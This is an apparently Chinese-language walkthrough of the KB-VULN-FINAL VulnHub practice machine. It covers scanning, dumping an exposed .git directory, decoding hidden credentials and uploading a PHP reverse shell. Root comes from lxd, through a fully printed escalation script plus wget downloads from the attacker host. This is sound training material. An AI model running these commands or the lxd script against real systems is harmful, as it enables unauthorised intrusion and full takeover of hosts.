靶机渗透练习52-KB-VULN-FINAL_vm搭建虚拟机kali 攻击靶机 一直都是ip地址滚屏

靶机描述

靶机地址：https://www.vulnhub.com/entry/kb-vuln-4-final,648/

Description

This machine is the kind that will measure your level in both research and exploit development. It includes 2 flags:user.txt and root.txt.

This works better with VirtualBox rather than VMware

一、搭建靶机环境

攻击机Kali：

IP地址：192.168.9.7

靶机：

IP地址：192.168.9.38

注：靶机与Kali的IP地址只需要在同一局域网即可（同一个网段,即两虚拟机处于同一网络模式）

该靶机环境搭建如下

1. 将下载好的靶机环境，导入 VritualBox，设置为 Host-Only 模式
2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l （指定网卡扫）

arp-scan -I eth0 -l

方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

☁  kali  nmap -A -sV -T4 -p- 192.168.9.38
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 13:55 CST
Nmap scan report for 192.168.9.38
Host is up (0.00046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cd:15:fb:cc:47:de:a3:16:e9:b8:6b:61:7a:25:5a:b7 (RSA)
|   256 82:a5:1b:08:06:12:c0:36:38:e7:53:18:47:ea:3f:f8 (ECDSA)
|_  256 f4:d9:65:bd:7d:68:03:31:c3:64:06:48:1d:fb:e7:47 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-git: 
|   192.168.9.38:80/.git/
|     Git repository found!
|     .gitignore matched patterns 'bug'
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN...
|     Remotes:
|       https://github.com/textpattern/textpattern.git
|_    Project type: node.js application (guessed from .gitignore)
|_http-title: Hacked!
MAC Address: 08:00:27:04:DB:A3 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.9.38

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.54 seconds

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

22—ssh—OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80—http—Apache httpd 2.4.29 ((Ubuntu))

2.2枚举漏洞

2.2.1 22 端口分析

一般只能暴力破解，暂时没有合适的字典

2.2.2 80 端口分析

访问 80 端口，鼠标无效？

等了一下，发现界面在变化

扫描一下目录：dirsearch -u http://192.168.9.38/

☁  kali  dirsearch -u http://192.168.9.38/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.9.38/-_22-02-23_14-01-34.txt

Error Log: /root/.dirsearch/logs/errors-22-02-23_14-01-34.log

Target: http://192.168.9.38/

[14:01:34] Starting: 
[14:01:57] 200 -  760B  - /.git/branches/
[14:01:57] 301 -  311B  - /.git  ->  http://192.168.9.38/.git/
[14:01:57] 200 -  265B  - /.git/config
[14:01:57] 200 -   73B  - /.git/description
[14:01:57] 200 -    3KB - /.git/
[14:01:57] 200 -   20B  - /.git/HEAD
[14:01:57] 200 -    3KB - /.git/hooks/
[14:01:58] 200 -  947B  - /.git/info/
[14:01:58] 200 -  240B  - /.git/info/exclude
[14:01:58] 301 -  321B  - /.git/logs/refs  ->  http://192.168.9.38/.git/logs/refs/
[14:01:58] 200 -    1KB - /.git/logs/
[14:01:58] 301 -  329B  - /.git/logs/refs/remotes  ->  http://192.168.9.38/.git/logs/refs/remotes/
[14:01:58] 301 -  336B  - /.git/logs/refs/remotes/origin  ->  http://192.168.9.38/.git/logs/refs/remotes/origin/
[14:01:58] 200 -  187B  - /.git/logs/HEAD
[14:01:58] 301 -  324B  - /.git/refs/remotes  ->  http://192.168.9.38/.git/refs/remotes/
[14:01:58] 200 -    1KB - /.git/objects/
[14:01:58] 200 -  187B  - /.git/logs/refs/remotes/origin/HEAD
[14:01:58] 200 -    1KB - /.git/refs/
[14:01:58] 301 -  327B  - /.git/logs/refs/heads  ->  http://192.168.9.38/.git/logs/refs/heads/
[14:01:58] 301 -  331B  - /.git/refs/remotes/origin  ->  http://192.168.9.38/.git/refs/remotes/origin/
[14:01:58] 301 -  322B  - /.git/refs/heads  ->  http://192.168.9.38/.git/refs/heads/
[14:01:58] 200 -   29B  - /.git/refs/remotes/origin/HEAD
[14:01:58] 200 -    3KB - /.git/packed-refs
[14:01:58] 301 -  321B  - /.git/refs/tags  ->  http://192.168.9.38/.git/refs/tags/
[14:01:59] 200 -  272B  - /.gitattributes
[14:01:59] 200 -  106B  - /.github/PULL_REQUEST_TEMPLATE.md
[14:01:59] 200 -    4KB - /.github/
[14:01:59] 200 -   62KB - /.git/index
[14:01:59] 200 -  355B  - /.gitignore
[14:01:59] 404 -  274B  - /.gitignore/
[14:02:02] 403 -  277B  - /.ht_wsr.txt
[14:02:03] 403 -  277B  - /.htaccess.bak1
[14:02:03] 403 -  277B  - /.htaccess.orig
[14:02:03] 403 -  277B  - /.htaccess.save
[14:02:03] 403 -  277B  - /.htaccess_orig
[14:02:03] 403 -  277B  - /.htaccess.sample
[14:02:03] 403 -  277B  - /.htaccess_extra
[14:02:03] 403 -  277B  - /.htaccessOLD
[14:02:03] 403 -  277B  - /.htaccess_sc
[14:02:03] 403 -  277B  - /.htaccessBAK
[14:02:03] 403 -  277B  - /.htaccessOLD2
[14:02:03] 403 -  277B  - /.htm
[14:02:03] 403 -  277B  - /.html
[14:02:03] 403 -  277B  - /.htpasswds
[14:02:03] 403 -  277B  - /.httr-oauth
[14:02:03] 403 -  277B  - /.htpasswd_test
[14:02:18] 403 -  277B  - /.php
[14:02:19] 500 -    0B  - /.phpstorm.meta.php
[14:03:09] 200 -   69KB - /HISTORY.txt
[14:03:10] 200 -    3KB - /INSTALL.txt
[14:03:11] 200 -   15KB - /LICENSE.txt
[14:03:16] 200 -    8KB - /README.md
[14:03:16] 200 -    1KB - /README.txt
[14:03:24] 200 -    3KB - /UPGRADE.txt
[14:06:07] 200 -  877B  - /composer.json
[14:06:07] 200 -    6KB - /composer.lock
[14:06:59] 404 -  274B  - /favicon.ico
[14:07:03] 301 -  312B  - /files  ->  http://192.168.9.38/files/
[14:07:04] 403 -  277B  - /files/
[14:07:26] 200 -  741B  - /images/
[14:07:26] 301 -  313B  - /images  ->  http://192.168.9.38/images/
[14:08:42] 200 -    3KB - /package.json
[14:09:34] 501 -   15B  - /rpc/
[14:09:41] 403 -  277B  - /server-status
[14:09:41] 403 -  277B  - /server-status/
[14:09:54] 301 -  312B  - /sites  ->  http://192.168.9.38/sites/
[14:09:55] 200 -  528B  - /sites/README.txt
[14:10:22] 301 -  313B  - /themes  ->  http://192.168.9.38/themes/
[14:10:22] 403 -  277B  - /themes/
[14:10:22] 404 -  274B  - /themes/default/htdocs/flash/ZeroClipboard.swf
[14:10:23] 200 -    4KB - /textpattern/

Task Completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87

2.2.3 git-dumper 下载文件

可以发现.git 目录，使用git-dumper下载文件

git-dumper http://192.168.9.38/.git/ backup

下载下来查看文件，没有发现什么密码信息

2.2.4 添加/etc/hosts

访问：http://192.168.9.38/sites/

看到了Textpattern CMS

查看一下源代码，发现了域名kb.final

咱们把域名添加到/etc/hosts，访问一下：http://kb.final/

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vMVuDgGJ-1650331960009)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220223142621498.png)]

2.2.5 google 搜索下载 KB-DUMP 文件

再次仔细看一下首页，恩，，，被黑客入侵了，首页已经被修改了
页面有提示：Search Me，即搜索黑客名：machineboy141

发现：https://github.com/machineboy141/KB-DUMP

2.2.6 提取图片中文件

查看解压出的文件：

使用工具提取图片中的信息：steghide extract -sf xxx.jpg

有三个文件无密码提取出文件

steganopayload1125546.txt，steganopayload202720.txt，steganopayload1125574.txt

分别查看一下内容

☁  KB-DUMP  cat steganopayload1125546.txt
6K3:C4:>6a_a_#                              
☁  KB-DUMP  cat steganopayload202720.txt
25>:?#                                             
☁  KB-DUMP  cat steganopayload1125574.txt
http://kb.final/textpattern/#   
1
2
3
4
5
6

尝试识别算法：https://www.dcode.fr/cipher-identifier

ASCII Shift Cipher解密一下无果

ROT - 47 Cipher解密得到：ezbircime2020

ROT - 47 Cipher解密得到：`adminR

这两个应该是账户密码：admin : ezbircime2020

尝试登陆，http://kb.final/textpattern/ 失败

想想这个不是靶机的文件是网上下载的

而这个靶机是 2021 年的，尝试密码 ezbircime2021 登陆成功

2.3漏洞利用

2.3.1 上传后门获取 shell

在后台寻找上传点

上传反弹shell文件

kali监听：nc -lvp 6666

组合路径：http://kb.final/textpattern/files/php-reverse-shell.php
访问没反应，换路径：http://kb.final/files/php-reverse-shell.php
反弹 shell 成功

使用 python 切换 bash：python3 -c 'import pty; pty.spawn("/bin/bash")'

2.3.2 信息收集获取用户 shell

查看 home 文件夹，获取账户：machineboy,进入目录后发现flag1，但是无权限

查看网站目录，寻找配置文件，在/var/www/html/textpattern/textpattern目录下找到

获取密码：ghostroot510
尝试切换 shell：su machineboy

成功切换用户，并拿到flag1

2.4权限提升

2.4.1 lxd 提权

使用 SSH 登陆：ssh machineboy@192.168.9.38

查看 id，可以发现当前用户在 lxd 组

搜索 lxd：searchsploit lxd

发现一个提权漏洞

将脚本拷贝到当前目录：searchsploit -m linux/local/46978.sh

查看文件：

☁  KB-VULN  cat 46978.sh 
#!/usr/bin/env bash

# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#          Victor Lasa      (vowkin)
# ----------------------------------

# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import $filename --alias alpine && lxd init --auto
  echo -e "[*] Listing images...\n" && lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0; while getopts ":f:h:" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi#    
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

根据step操作一下

下载文件：https://github.com/saghul/lxd-alpine-builder.git

解压后进入文件目录

编译映像文件(需访问外网)：bash build-alpine

下载镜像文件和 exp 脚本到目标机下的/tmp目录
wget http://192.168.9.7:888/46978.sh
chmod 777 46978.sh
wget http://192.168.9.7:888/alpine-v3.13-x86_64-20210218_0139.tar.gz
在目标机器下执行以下命令
初始化容器：lxd init

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-79pxnwFY-1650331960014)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220223153017493.png)]

运行脚本：./46978.sh -f alpine-v3.13-x86_64-20210218_0139.tar.gz

成功提权

最终在/mnt/root/root目录下找到flag2

总结

本节通过 google 搜索获取 github 中的工具，然后提取信息，获取用户名和密码，进入后台利用文件上传漏洞获取 shell，之后通过 lxd 提权。

1. 信息收集
2. Google 信息收集
3. 文件上传漏洞
4. lxd 提权